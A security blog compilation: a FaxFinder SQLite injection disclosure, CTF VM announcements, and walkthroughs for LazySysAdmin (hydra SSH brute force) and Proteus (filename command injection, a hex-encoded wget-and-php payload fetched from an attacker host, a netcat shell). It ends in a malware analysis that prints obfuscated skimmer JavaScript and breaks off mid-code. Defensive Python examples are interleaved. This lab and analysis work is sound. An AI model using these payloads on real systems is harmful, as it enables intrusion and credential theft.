CVE-2018-17562 – FaxFinder 5.0.5.8 < SQLite Injection Vulnerability

Hi everyone,

Today I am writing a PoC for a new CVE I found in FaxFinder 5.0.5.8 and older, which can be exploited through SQLite injection. I reported this flaw to the vendor and they fixed it in the new release, FaxFinder 5.1.6. This post will serve as the official reference accrediting CVE-2018-17562. I will also include the conversation thread I had with MultiTech when reporting this flaw.

CVE Founder: Max Segura
Vendor: Multitech
Software: FaxFinder
Version: 5.0.5.8 and older
Vulnerability: SQLite Injection
Reported: 11-22-17
Fixed: 9-25-18

Intro

This vulnerability allows a remote, unauthenticated attacker to exploit an SQLite injection flaw present in FaxFinder 5.0.5.8 and older. A valid OID is needed as the injection point. Upon exploitation, the attacker gains access to the underlying database schema. The information in this post is intended to promote security awareness. Do not use this information to intentionally abuse a private computer system. You are responsible for your own actions; hacking is unlawful!

Proof of Concept

This section contains step-by-step instructions on how to exploit this flaw. First, to prove that this flaw can be exploited by an unauthenticated user, let's take a look at the FaxFinder login page in InPrivate Browsing or Incognito mode.

Once the affected version has been identified, the next step would be to obtain a valid OID number from the fax server so we have an injection point. For example, take a look at the URL below:

https://site.com/status/call_details?oid=28807

The above image demonstrates that any user can enumerate valid OIDs from the fax server, which is easily automated with a script. Now that we have a starting point, we can expose the flaw by tampering with the syntax used by the software. Inserting an apostrophe (') usually breaks the query's syntax.

This indicates that the application can be exploited. The attack vector has been withheld to prevent unauthorized exploitation. If you need it to test your own systems, I may be able to disclose it privately.

The following information was extracted:

CREATE TABLE call_entry( oid INTEGER PRIMARY KEY, timestamp TEXT DEFAULT CURRENT_TIMESTAMP, rcpt_fax TEXT NOT NULL, direction TEXT NOT NULL, entrykey TEXT, remote_id TEXT NOT NULL, status TEXT NOT NULL, modem_nr INTEGER, size INTEGER, pages INTEGER, resolution TEXT NOT NULL, baud_rate TEXT NOT NULL, width TEXT NOT NULL, height TEXT NOT NULL, data_compression TEXT NOT NULL, error_correction TEXT NOT NULL, init_time TEXT NOT NULL, off_hook_time TEXT NOT NULL, connect_time TEXT NOT NULL, elapsed_time INTEGER, scan_line_time INTEGER, modem_trace_log TEXT, all_dtmf_digits TEXT NOT NULL )

This vector can be modified to inject other versions of FaxFinder up to the penultimate release of 5.0.5.8. Please upgrade to version 5.1.6 to patch this flaw.
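To make the apostrophe symptom and the fix concrete, here is an added example in Python; it is not FaxFinder code (the product's backend is not shown on this page). It rebuilds a cut-down call_entry table in an in-memory SQLite database with constructed rows, puts a handler that concatenates the oid parameter into the query beside one that validates the type and binds the value, and probes both with the OID from the URL above and with the same OID followed by an apostrophe. The column subset, the rows and the handler names are assumptions.

```python
import sqlite3

# Constructed, in-memory stand-in for the call_entry table whose schema the
# injection exposed; only a few of its columns are kept here.
SCHEMA = """
CREATE TABLE call_entry(
    oid INTEGER PRIMARY KEY,
    timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
    rcpt_fax TEXT NOT NULL,
    direction TEXT NOT NULL,
    status TEXT NOT NULL
)"""

# Constructed sample rows; 28807 is the OID from the URL in the write-up.
ROWS = [
    (28807, "15551230000", "outbound", "complete"),
    (28808, "15551230001", "inbound", "failed"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany(
        "INSERT INTO call_entry(oid, rcpt_fax, direction, status) VALUES (?, ?, ?, ?)",
        ROWS,
    )
    conn.commit()
    return conn


def call_details_vulnerable(conn, oid):
    # The request parameter is spliced into the statement text, so the value
    # is parsed as SQL: an apostrophe unbalances the quoting and the query
    # fails with a syntax error, which is the symptom observed above.
    sql = "SELECT oid, rcpt_fax, status FROM call_entry WHERE oid = '" + oid + "'"
    return conn.execute(sql).fetchone()


def call_details_hardened(conn, oid):
    # Two independent controls: validate the type (an OID is a positive
    # integer) and bind the value as a parameter so the driver keeps data and
    # SQL grammar apart even if the validation is loosened later.
    if not oid.isdigit():
        raise ValueError("oid must be a positive integer")
    sql = "SELECT oid, rcpt_fax, status FROM call_entry WHERE oid = ?"
    return conn.execute(sql, (int(oid),)).fetchone()


def probe(conn, handler, oid):
    """Run a handler and report ('ok', row) or ('error', exception name)."""
    try:
        return ("ok", handler(conn, oid))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    db = build_db()
    for value in ("28807", "28807'", "abc"):
        print(repr(value),
              "vulnerable:", probe(db, call_details_vulnerable, value),
              "hardened:", probe(db, call_details_hardened, value))
```

The vulnerable handler answers the plain OID correctly and raises sqlite3.OperationalError on the apostrophe, exactly the behaviour used above to confirm the flaw; the hardened handler answers the same query and rejects the malformed value before it ever reaches SQLite.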

Reporting Time Table

Here you can find my dialog with MultiTech to fix this vulnerability. This flaw was recognized in version 5.0.5.8 and the zero day was patched on 9-25-18.

As always, thanks for reading!


The Ether – A New Boot 2 Root Hacking Challenge

Introduction

Lately, I’ve been enjoying creating hacking challenges for the security community. This new challenge encapsulates a company, entitled – The Ether, who has proclaimed an elixir that considerably alters human welfare. The CDC has become suspicious of this group due to the nature of the product they are developing.

The Goal

The goal is to find out what The Ether is up to. You will be required to break into their server, root the machine, and retrieve the flag. The flag will contain more information about The Ether’s ominous operations regarding this medicine.

Any Hints?

This challenge is not for beginners. There is a relevant file on this machine that plays an important role in the challenge; do not waste your time trying to de-obfuscate it. I say this to keep you on track. This challenge is designed to test you in multiple areas and it's not for the faint of heart!

Last Words

Whatever you do, do not give up! Exhaust all of your options! I'm looking forward to having OSCPs take this challenge. As always, good luck, have fun, God bless, and may the s0urce be with you.

http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip

f1re_w1re

LazySysAdmin Hacking Challenge

Introduction

Welcome back, everyone. In this new thread I will be posting my solution to the LazySysAdmin hacking challenge found on Vulnhub and my overall thoughts about it. I have to be honest, I struggled with completing this challenge, primarily because I spent countless hours looking for web application flaws and inspecting every single avenue of exploitation. In hindsight, the challenge could have been completed in a matter of minutes, but of course the reality of arriving at such a solution takes... hours.

The description of the challenge follows – The story of a lonely and lazy sysadmin who cries himself to sleep. According to the author, enumeration was key to solve this puzzle.

Tools used:
– Hydra
– SMBClient
– Dirbuster (or alike tools)
– Python, for automating tasks on the fly (more on this later).

Target Enumeration

There were a couple of open ports upon scanning the target: your standard HTTP port, SMB port, and SSH port. At first, the service on port 80 looked promising! I was wrong, big time. I spent a couple of hours a day looking at directory listings, analyzing WordPress install files, and phpinfo() output; however, this was a huge diversion. After giving up on that, I took another approach and was curious what the SMB daemon offered.

smbclient -L 192.168.0.14

I saw a couple of shares, two of which could not be used to leverage a vulnerability. I was able to connect to the share$ share and list the files in the document root.

smbclient '\\192.168.0.14\share$'

The deets.txt file grabbed my attention so I decided to download it and find its contents:

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

Brute Forcing Fun and Flag

I knew that 12345 was the password to something, but I was not sure what. Based on my research on the WordPress site previously, possible users were Admin, togie, or root. In context with the challenge (a lazy admin), I was positive that root login was enabled on the SSH daemon. The first thing I tried, despite having a possible password, was to brute force the root SSH account. I was shocked to find the following:

hydra -l root -P cracker/rockyou.txt 192.168.0.14 ssh

The root password was indeed 12345. I was able to sign in via SSH and retrieve the flag.

After completing this challenge, I still had questions, and I was wondering how secure the WordPress site was; after all, it was running the latest version. After doing some recon on the file system, I placed the admin's password in one of my word lists to see if local brute force protection was enabled.

After 50 password attempts, I was able to brute force the admin page through XMLRPC. This password grants you access to the WP dashboard and MySQL database. What I found aligns with the context of a lazy system admin.
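From the defender's side of the same story, the following added Python example (not part of the original post) parses constructed sshd auth-log lines modelling a password-guessing run like the one above and raises three alerts: repeated failures from one source inside a time window, a successful login that follows those failures, and any successful password login as root, which PermitRootLogin no or prohibit-password in sshd_config would have blocked. The hostname, timestamps, ports and the second client address are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (not taken from the challenge) modelling the
# scenario above: a password-guessing run against root that eventually succeeds.
SAMPLE_LOG = """\
Nov 22 10:00:01 lazysysadmin sshd[1201]: Failed password for root from 192.168.0.16 port 50122 ssh2
Nov 22 10:00:02 lazysysadmin sshd[1203]: Failed password for root from 192.168.0.16 port 50124 ssh2
Nov 22 10:00:02 lazysysadmin sshd[1205]: Failed password for root from 192.168.0.16 port 50126 ssh2
Nov 22 10:00:03 lazysysadmin sshd[1207]: Failed password for invalid user admin from 192.168.0.16 port 50128 ssh2
Nov 22 10:00:04 lazysysadmin sshd[1209]: Failed password for root from 192.168.0.16 port 50130 ssh2
Nov 22 10:00:05 lazysysadmin sshd[1211]: Accepted password for root from 192.168.0.16 port 50132 ssh2
Nov 22 10:30:00 lazysysadmin sshd[1300]: Accepted publickey for togie from 192.168.0.20 port 40000 ssh2
"""

# Matches the two sshd message shapes we care about; other lines are ignored.
LINE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line, year=2017):
    """Parse one sshd auth line into a dict, or None for lines we do not model."""
    m = LINE.match(line)
    if not m:
        return None
    stamp = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    return {"ts": stamp, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect(log_text, threshold=4, window=timedelta(minutes=5)):
    """Return (kind, ip) alerts in log order.

    bruteforce             - `threshold` failures from one IP inside `window`
    success-after-failures - a login from an IP that still has failures in the window
    root-password-login    - password authentication for root succeeded
    """
    alerts = []
    recent_failures = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        fails = recent_failures[ev["ip"]]
        # Drop failures that have aged out of the sliding window.
        fails[:] = [t for t in fails if ev["ts"] - t <= window]
        if ev["result"] == "Failed":
            fails.append(ev["ts"])
            if len(fails) == threshold:      # alert once, when the threshold is crossed
                alerts.append(("bruteforce", ev["ip"]))
            continue
        if fails:
            alerts.append(("success-after-failures", ev["ip"]))
        if ev["user"] == "root" and ev["method"] == "password":
            alerts.append(("root-password-login", ev["ip"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The threshold and window are deliberately low for the sample; on a real host the interesting part is the second and third alerts, since a success right after a burst of failures is what distinguishes a guessed password from ordinary noise, and a root password login at all means the sshd configuration is weaker than it should be.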

Conclusion

What did I learn? Well, at first I got lost in the sea of files, checking to see which ones were world-readable. I got very frustrated and knew that my last-ditch option was a brute force attempt; little did I know that was the fastest way to solve this challenge. An SSH brute force attack would have gotten you root access and the solution to this challenge. Once everything was figured out, it all looked simple, but I cannot hide the fact that this took me a couple of days to riddle out! What was your solution?

Until next time,
May the s0urce be with you.

New H.A.S.T.E Hacking Challenge

Hi, from the other side of the wire!

On this post, I want to highlight a new VM that I made to accentuate web application vulnerabilities. This vulnerable-by-design box depicts a hacking company known as H.A.S.T.E, or Hackers Attack Specific Targets Expeditiously, capable of bringing down any domains on their hit list.

I would classify this challenge as medium difficulty, requiring some trial and error before a successful takeover can be attained. You don't have to root this machine to complete the challenge! All you have to do is get some sort of shell on it.

The H.A.S.T.E VM can be downloaded with the link below:
http://www.mediafire.com/file/115hejg5umvbnpq/HASTEVM.zip

You will need VMware Player to virtualize the VMX.

If you enjoy web application flaws, you should have fun with this challenge. Let me know how it goes and feedback is always welcomed! Looking forward to solutions.

f1re_w1re, out.

EDIT: I've been very pleased with the number of people attempting to solve this challenge. So far there have been 3 successful researchers. The first was MrMxyzptlk, then Dweezy, and finally Amonsec with the fantastic walkthrough. I will be developing other VMs that are a bit more complex to challenge the security community. Thank you all for playing!

The Proteus Challenge

Introduction

Hi, yet again, World Wide Web. Lately, I’ve been looking for boot to root challenges that haven’t been documented online. Recently, I found one on Vulnhub entitled “Proteus” that did not have any walkthroughs. So with that statement, I present you with the solution to the Proteus challenge. This thread will touch upon the following concepts:

  • Basic Linux Commands
  • Basic Linux System Files
  • HEX and ASCII Conversions

The pseudo scenario of this challenge pertains to an IT company that is implementing a malware analysis tool that scans potentially malicious files. It uses the strings and objdump commands to find more information about a file. The target IP is 192.168.0.14 and the attacking machine 192.168.0.16.

System Discovery

When I first discovered Proteus' IP address, the TCP scan I ran did not reveal anything too sensitive, showing only Apache and SSH listening. Before pointing my web browser at the site, I probed the SSH service only to find out that password-based authentication was not in use. This meant that brute forcing this service was out of the question, since the Proteus box relied on public key authentication.

When I visited the web page, I was presented with the following depiction of the site.

I decided to investigate the malware analysis tool of this fictional company. One thing that caught my attention was the requirement to upload certain file types. The allowed MIME types were application/x-executable and application/x-sharedlib. I decided to play along and see what happened. I wrote a really quick C program to upload.

#include <stdio.h>

/* Minimal program compiled into an ELF binary purely to test the upload form */
int main(void)
{
    printf("exec test\n");
    return 0;
}

After I uploaded the file, the next screen showed the output of strings and objdump.

When I first saw this, my initial thought was either to exploit the output of strings or objdump, or that there was some sort of buffer overflow I had to abuse. Although a buffer overflow seems possible (based on the extensive testing I did), I am not adept at binary exploitation; however, I did manage to get RCE.

Let's face it, black-box testing is difficult and one always has to speculate about the backend code. Any user input should be considered malicious, and I knew that the file I was uploading could be tampered with. If we are lucky, we should be able to mess with the naming structure and see whether the statement used to list the malware samples on the page can also be taken advantage of.

Remote Code Execution

RCE is one of the most complex flaws to exploit because such flaws are difficult to spot. In this challenge, I was able to execute arbitrary code and shell this box in a very peculiar way.

Going back to the Proteus home page, I decided to upload another malware sample, but this time catch the request in Burp and modify it. The final request looked like this:

Content-Disposition: form-data; name="file"; filename="test.exe;ls -la"

I let the request fly and the following page looked promising.

I was pleased to see this, and my mind quickly formulated the next steps to gain access. Before proceeding with anything premeditated, I was curious to see what was under /tmp, so I crafted the following request:

Content-Disposition: form-data; name="file"; filename="test.exe;ls -la /tmp"

To my amazement, there was no output on the sample page. This confused me. I spent most of my time trying to figure out how to write files to other places in the system. There were 2 big problems I encountered.

1. The document root, and its child folders, were not writeable.
2. I could not list anything outside the document root.

Having RCE is great; however, if it cannot be used to gain access, it does not serve much purpose. After 20 minutes of testing and critical thinking, I could only come up with one answer: input sanitization.

Bypassing RCE Restrictions

I can only assume that my forward slashes (/) were being escaped, dropped, or replaced. So I had to come up with another method of getting a shell without a "/" anywhere in the payload. This challenge made me think, but I did manage to figure it out with several Linux pipes. Below is the workflow I followed to carry out the attack successfully.

1. Getting the shell script, putting it in /tmp, and executing it.
This was done with: wget http://192.168.0.17/shell.txt -O /tmp/shell.txt; php -f /tmp/shell.txt

2. Bypassing the “/” filter.
I encoded the above command in HEX then decoded it with xxd, like so: echo 7767657420687474703a2f2f3139322e3136382e302e31372f7368656c6c2e747874202d4f202f746d702f7368656c6c2e7478743b20706870202d66202f746d702f7368656c6c2e747874 | xxd -r -p

3. Executing the decoded string (putting it all together).
echo 7767657420687474703a2f2f3139322e3136382e302e31372f7368656c6c2e747874202d4f202f746d702f7368656c6c2e7478743b20706870202d66202f746d702f7368656c6c2e747874 | xxd -r -p | xargs -0 bash -c
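The write-up reasons that a character filter on "/" was the only thing standing between the filename and the shell. As an added illustration (not the challenge's PHP, which is not published; a Python stand-in with hypothetical function names), the block below builds the command line three ways: the raw interpolation, the inferred slash filter, and an allow-listed basename passed as a single argv element. It checks each against a benign name, the injected name shown above, and a constructed name that contains no slash at all. SAMPLES_DIR comes from the config.php shown later in the post; nothing is executed.

```python
import os
import re
import secrets

# Path from the config.php shown later in the write-up; used here only to
# build command lines, nothing is run.
SAMPLES_DIR = "/home/malwareadm/samples/"

# Constructed filenames: a benign upload, the write-up's injected name, and a
# hex-decode chain that contains no "/" at all (6c73202d6c61 is "ls -la").
BENIGN = "test.exe"
INJECTED = "test.exe;ls -la"
NO_SLASH = "test.exe;echo 6c73202d6c61 | xxd -r -p | bash"

# Characters that let a POSIX shell start a second command or substitution.
SHELL_META = re.compile(r"[;&|`$()<>\n]")


def build_command_vulnerable(filename):
    """Hypothetical original behaviour: one shell string with the raw filename."""
    return "strings " + SAMPLES_DIR + filename


def build_command_slash_filter(filename):
    """The filter the write-up infers: "/" is dropped, other metacharacters survive."""
    return "strings " + SAMPLES_DIR + filename.replace("/", "")


def safe_sample_name(filename):
    """Allow-list the stored name: basename only, conservative charset, random prefix.

    The random prefix also stops two uploads from colliding or overwriting
    each other; the original client name is kept only as a suffix.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if not re.fullmatch(r"[A-Za-z0-9._-]{1,64}", base) or base.startswith("."):
        raise ValueError("rejected filename: %r" % filename)
    return secrets.token_hex(8) + "_" + base


def build_command_hardened(filename):
    """argv list for subprocess.run(..., shell=False): the name is one argument."""
    return ["strings", os.path.join(SAMPLES_DIR, safe_sample_name(filename))]


def shell_would_split(command):
    """True when a POSIX shell would see more than one command in the string."""
    return SHELL_META.search(command) is not None


def hardened_accepts(filename):
    try:
        build_command_hardened(filename)
        return True
    except ValueError:
        return False


def audit(filename):
    """Summarise how each builder treats one filename."""
    return {
        "vulnerable_splits": shell_would_split(build_command_vulnerable(filename)),
        "filtered_splits": shell_would_split(build_command_slash_filter(filename)),
        "hardened_accepts": hardened_accepts(filename),
    }


if __name__ == "__main__":
    for name in (BENIGN, INJECTED, NO_SLASH):
        print(repr(name), audit(name))
```

The point the table makes is that a deny-list on one character changes nothing about the shell grammar the filename lands in, while refusing to involve a shell at all (argv list) and allow-listing the stored name removes the whole class of problem rather than one payload.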

Getting a Shell!

The end request appears as shown:

A local Netcat listener was set up and shortly afterwards greeted me with shell access to the box:

After some digging, I found useful files and links. The first thing I learned was that the server’s document root was a symbolic link to the home directory of the malwareadm user. The group file revealed an interesting detail.

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,malwareadm
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:malwareadm
floppy:x:25:
tape:x:26:
sudo:x:27:malwareadm
audio:x:29:
dip:x:30:malwareadm
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:malwareadm
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-timesync:x:102:
systemd-network:x:103:
systemd-resolve:x:104:
systemd-bus-proxy:x:105:
input:x:106:
crontab:x:107:
syslog:x:108:
messagebus:x:109:
netdev:x:110:
lxd:x:111:malwareadm
mlocate:x:112:
uuidd:x:113:
ssh:x:114:
malwareadm:x:1000:
lpadmin:x:115:malwareadm
sambashare:x:116:malwareadm
ssl-cert:x:117:
mysql:x:118:

The malwareadm user was part of some groups but most importantly part of the sudo group.
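To turn the group-file reading above into a repeatable check, here is an added Python snippet (not part of the original write-up) that parses /etc/group lines, lists the supplementary groups of a user, and flags the ones that commonly amount to root on a Debian/Ubuntu box. The embedded lines are a subset of the listing above; the privileged-group table is a general assumption about those distributions, not something specific to Proteus.

```python
# Lines copied from the /etc/group listing above, trimmed to the groups that
# matter for this check plus a few ordinary ones.
GROUP_FILE = """\
root:x:0:
adm:x:4:syslog,malwareadm
cdrom:x:24:malwareadm
sudo:x:27:malwareadm
dip:x:30:malwareadm
shadow:x:42:
plugdev:x:46:malwareadm
lxd:x:111:malwareadm
malwareadm:x:1000:
lpadmin:x:115:malwareadm
sambashare:x:116:malwareadm
mysql:x:118:
"""

# Groups whose membership is equivalent to, or a short path to, root on a
# typical Debian/Ubuntu system (a general assumption, not box-specific).
PRIVILEGED = {
    "sudo": "may run commands as root via sudo",
    "adm": "reads most system logs under /var/log",
    "disk": "raw read/write access to block devices",
    "shadow": "reads the password hashes in /etc/shadow",
    "lxd": "controls the LXD daemon, which runs as root",
}


def parse_group_file(text):
    """Map each group name to the list of supplementary members listed for it."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _password, _gid, members = line.split(":", 3)
        groups[name] = [m for m in members.split(",") if m]
    return groups


def groups_of(groups, user):
    """Supplementary groups listing `user` (the primary group lives in /etc/passwd)."""
    return sorted(g for g, members in groups.items() if user in members)


def privileged_memberships(groups, user):
    """Return {group: reason} for the user's memberships that warrant attention."""
    return {g: PRIVILEGED[g] for g in groups_of(groups, user) if g in PRIVILEGED}


if __name__ == "__main__":
    parsed = parse_group_file(GROUP_FILE)
    print("malwareadm groups:", groups_of(parsed, "malwareadm"))
    for group, reason in privileged_memberships(parsed, "malwareadm").items():
        print(f"  {group}: {reason}")
```

Run against a live system with open("/etc/group").read() in place of the embedded text; the same parser works because the file format is identical.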

Capturing the Flag

After some recon, I found the following files that helped me solve this challenge.

cat /home/malwareadm/sites/proteus_site/web/cfg/config.php

<?php

class Conf
{

    /* MySQL */
    const MYSQL_USERNAME    =   'root';
    const MYSQL_PASSWORD    =   'viWJ.cgdf&3a]d3xh;C/c]&c?';
    const MYSQL_HOST        =   '127.0.0.1';
    const MYSQL_DATABASE    =   'proteus_db';

    /* Application */
    const DEBUG                 =   false; 	                    //true/false
    const INSTALLED_DIRECTORY   =   '/';                        //something
    const MAIL_ALIAS		    =	'malwareadm@proteus.local';	//Something like user@internet.co.za
    const SECRET                =   'thisisthesecret';          //This is the secret to salt the hashes
    const FILE_PATH             =   '/home/malwareadm/samples/'; //This is the file path of where the execs will be saved
}

cat /home/malwareadm/sites/proteus_site/admin_login_request.js

// THIS IS JUST USED TO IMPERSONATE AN ADMIN FOR THE CHALLENGE

var username  = 'malwareadm';
var pwd = 'q-L%40X%21%7Bl_%278%7C%29o%3FQ%2BTapahQ%3C_';

var webPage = require('webpage');
var page = webPage.create();
var postBody = 'username=' + username + '&password=' + pwd;

page.open('http://127.0.0.1/samples', 'post', postBody, function (status) {
	if (status !== 'success') {
		console.log('Unable to post!');
	} else {
		console.log(JSON.stringify({
			cookies: phantom.cookies
		}));
	}
	phantom.exit();
});

These files revealed very crucial information to complete the challenge. These 2 files show the MySQL root password and also the malwareadm user's password, URL-encoded; it decodes to "q-L@X!{l_'8|)o?Q+TapahQ<_". They also show the salt used for the password hashes, which could be used for cracking (not my cup of tea for this challenge). At this point, all we have to do is switch to the malwareadm user. I was having issues changing my shell from sh, so I used Python to get a bash shell to complete this transition.

The flag is actually a picture.

This completes the challenge, very humorously.

Conclusion

To end things, this is probably the easiest way to complete this box. I am convinced there are other methods to obtain the flag. I noticed that one of the files I had access to had the SETUID bit set; I am sure exploiting this binary is another way to get the flag. Additionally, we have database access, so we could potentially escalate privileges through a malicious UDF. Brute forcing local accounts can also be another method of solving this machine. As far as I can see, there are different routes to complete this challenge. I am looking forward to exploring and publishing other ways to complete it when I have more time.

Nonetheless, I really enjoyed every bit of this challenge and I’m looking forward to other ones! I hope you enjoyed reading my ramblings.

Happy hacking!

Code in The Shadows

Introduction

Hello, everyone. Recently, I stumbled upon an interesting piece of malware as I happily ventured my browser through the internet. The obfuscated code I am going to reveal was found on a relatively large office supply website. I had fun reverse engineering this piece of code and I will do my best documenting it here. For the sake of the site's and its users' privacy, the name of the affected domain will be excluded from this write-up.

Knowledge on the following areas will help you understand this post:

  • Base64
  • XOR
  • ASCII Characters

I want to give an honourable mention to one of my colleagues, Dark C0d3r, with whom I've bounced ideas back and forth regarding my findings. You can read really cool l33t stuff on his blog at https://da3m0ns3c.blogspot.com/. He beat me to the write-up; however, since I discovered this malware, it is only appropriate to document my thoughts as the finder after all. Big props to him and his team, they really are an intelligent bunch. Without further ado, let's begin!

Obfuscated Code

One casual day at work, I was tasked by my network engineer to investigate why one of the sites we purchase materials from was being blocked by our anti-virus. At first, I was not sure if our AV was producing a false positive; however, visiting the site was no longer possible from a web browser due to the security policy in place.

Although our company predominantly uses Windows, I had access to a Linux machine. I proceeded to hand the URL to the cURL binary and retrieved the possible culprit of the interesting journey that began that day. My eyes feasted on the obfuscated code below.

var PRZKZPVRCI = atob('var DRYUQIEDHS = String.fromCharCode(13-3,125-7,102-5,118-4,39-7,113-6,107-6,127-6,39-7,66-5,41-9,41-2,111-4,75-4,79-4,111-4,124-3,95-6,91-6,92-3,127-6,79-9,46-7,64-5,11-1,122-4,106-9,120-6,33-1,108-7,116-6,101-2,106-5,107-7,39-7,64-3,39-7,42-3,86-4,75-4,113-9,53-2,79-8,68-2,112-1,123-9,86-6,76-9,108-1,87-9,110-9,72-1,72-3,122-2,81-6,107-3,113-5,98-8,85-9,105-2,120-9,57-8,75-5,113-8,94-9,84-9,80-3,130-9,80-7,78-9,73-3,59-8,116-8,116-5,90-5,51-2,111-3,114-5,86-3,57-7,109-9,123-9,85-2,57-8,58-5,51-1,105-8,112-7,113-6,96-7,74-1,89-8,57-5,54-5,79-3,131-9,84-2,107-6,108-7,96-8,55-2,55-2,79-1,70-3,107-8,107-5,83-7,55-5,92-7,95-5,74-3,72-4,105-6,125-5,82-4,111-7,85-3,122-5,86-5,118-9,112-5,55-8,69-3,73-6,117-6,122-6,75-1,129-7,73-8,91-3,79-6,90-5,87-9,50-2,106-4,91-6,79-5,97-9,83-8,114-9,67-2,57-2,73-6,108-2,80-7,92-2,78-2,109-4,87-2,82-5,87-2,90-3,61-8,62-6,95-6,116-6,85-7,80-3,72-4,89-5,75-2,109-1,75-8,69-4,50-2,123-4,82-3,115-9,103-3,94-4,82-4,87-5,60-4,115-6,84-5,83-1,58-1,89-7,107-8,75-3,86-1,111-6,103-4,56-8,126-6,82-6,98-8,124-2,53-5,82-7,70-3,56-5,108-1,129-7,82-7,128-8,94-5,120-6,85-2,60-9,114-2,117-3,70-2,128-8,97-8,56-2,80-7,70-2,90-9,100-1,79-4,68-2,66-9,118-6,85-6,83-2,57-5,108-6,84-4,69-2,101-2,120-6,74-2,74-6,89-7,84-3,92-8,91-4,117-1,79-3,73-5,129-7,104-1,116-6,104-3,84-2,75-9,64-7,96-7,87-2,57-8,123-9,84-1,127-7,68-3,52-5,109-9,91-3,70-1,101-4,80-4,112-9,56-4,110-3,75-2,69-2,109-6,91-4,80-2,108-2,58-6,125-6,74-2,78-7,61-8,74-7,100-2,113-4,121-6,83-2,106-7,56-5,116-8,53-4,103-2,93-7,110-3,52-4,70-2,115-9,85-8,47-4,79-8,87-5,105-5,110-5,94-6,56-5,111-3,92-2,87-8,53-3,75-5,118-8,100-3,128-8,52-4,90-1,84-9,59-8,87-2,121-6,73-2,69-2,72-3,84-5,78-3,85-1,62-5,77-1,91-9,76-4,108-1,60-5,84-5,69-4,57-1,119-1,77-9,72-5,97-8,50-3,70-4,70-5,117-1,58-7,79-6,76-9,115-4,100-1,83-5,72-5,115-4,112-9,80-4,107-4,94-9,79-1,96-7,113-5,64-7,57-4,91-4,92-9,59-3,87-9,98-8,53-3,85-7,80-5,73-5,69-1,105-2,124-3,84-4,72-6,106-7,124-3,91-8,125-3,122-7,54-3,87-4,1
24-5,124-5,60-8,78-1,108-2,120-1,94-6,84-7,115-8,91-6,120-6,83-7,107-4,90-5,104-3,79-3,90-6,50-1,55-2,85-3,74-2,124-8,81-5,103-3,52-2,79-5,79-3,67-2,111-3,83-5,55-6,109-8,90-4,113-5,111-2,76-5,88-5,80-7,54-7,73-1,106-3,118-3,58-7,100-2,115-7,80-2,98-8,95-5,113-9,99-9,81-3,103-6,52-4,117-2,85-8,84-5,76-8,74-1,65-9,72-2,129-7,75-1,83-7,105-4,118-9,119-4,102-1,78-7,69-1,53-1,121-2,79-1,120-1,51-2,115-4,78-6,129-8,112-9,81-9,71-5,68-3,54-2,57-1,83-9,122-2,117-6,94-5,86-8,90-9,61-8,123-5,95-6,116-8,73-7,125-3,110-9,95-7,87-2,127-8,77-5,57-7,95-5,77-9,78-1,112-7,115-4,82-5,81-9,77-9,100-1,109-5,101-1,127-7,67-2,119-8,70-2,124-3,80-7,130-8,79-5,67-1,64-7,127-7,101-2,114-8,56-4,90-3,77-2,86-5,126-7,120-6,78-2,112-5,127-7,85-4,109-8,89-1,91-9,110-3,96-9,93-6,125-9,106-9,92-2,124-2,108-9,90-2,96-9,85-2,124-5,54-6,82-2,109-5,125-6,115-4,81-9,54-4,112-5,108-3,67-1,85-3,51-3,61-5,81-5,86-4,91-2,106-4,105-7,109-2,127-8,114-6,83-9,67-1,62-5,105-4,106-7,81-9,88-2,61-9,88-6,77-6,93-3,77-6,107-7,114-7,78-8,85-9,94-7,94-6,115-7,52-3,109-8,87-1,113-6,61-7,78-8,59-9,100-1,44-1,75-8,112-8,58-6,61-5,83-4,127-6,51-2,96-8,83-7,126-7,94-9,107-1,82-6,107-3,84-7,53-3,88-8,53-2,55-6,48-5,75-4,108-2,86-5,78-3,81-4,76-9,107-7,86-9,87-2,79-7,116-8,52-4,96-6,71-1,114-6,115-1,88-1,112-3,58-5,123-9,78-9,76-4,87-9,86-2,103-3,91-3,108-1,72-3,98-8,112-9,57-5,120-6,83-4,67-2,56-3,94-4,77-4,117-9,62-5,59-6,94-7,91-4,96-6,81-5,78-2,107-2,58-9,78-2,88-3,91-8,58-6,59-3,83-5,123-3,56-8,114-2,75-3,75-4,113-6,110-4,66-1,108-5,113-2,119-3,85-6,112-7,123-8,74-9,91-1,115-8,51-2,108-4,106-9,122-2,123-4,89-8,87-9,126-4,75-6,53-3,72-4,118-9,107-4,69-1,83-7,107-1,104-1,105-3,73-3,106-1,119-4,118-3,101-1,128-8,94-9,114-8,68-2,92-9,73-8,49-2,71-6,57-8,115-7,115-5,102-2,95-8,121-5,89-8,97-7,108-4,67-1,81-3,99-2,53-5,123-7,99-9,105-4,96-8,92-6,55-2,70-2,113-8,57-1,72-2,78-5,129